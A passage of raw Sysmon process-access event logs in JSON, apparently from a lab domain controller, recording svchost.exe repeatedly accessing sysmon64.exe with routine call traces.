05:46:55.922","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2304,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.922\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:55.922","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2305,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.922\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:55.922","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2306,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.922\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:55.922","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2307,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.922\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:55.922","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2308,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.922\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:55.922","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2309,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.922\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:55.922","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2310,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.922\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:55.922","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2311,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.922\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 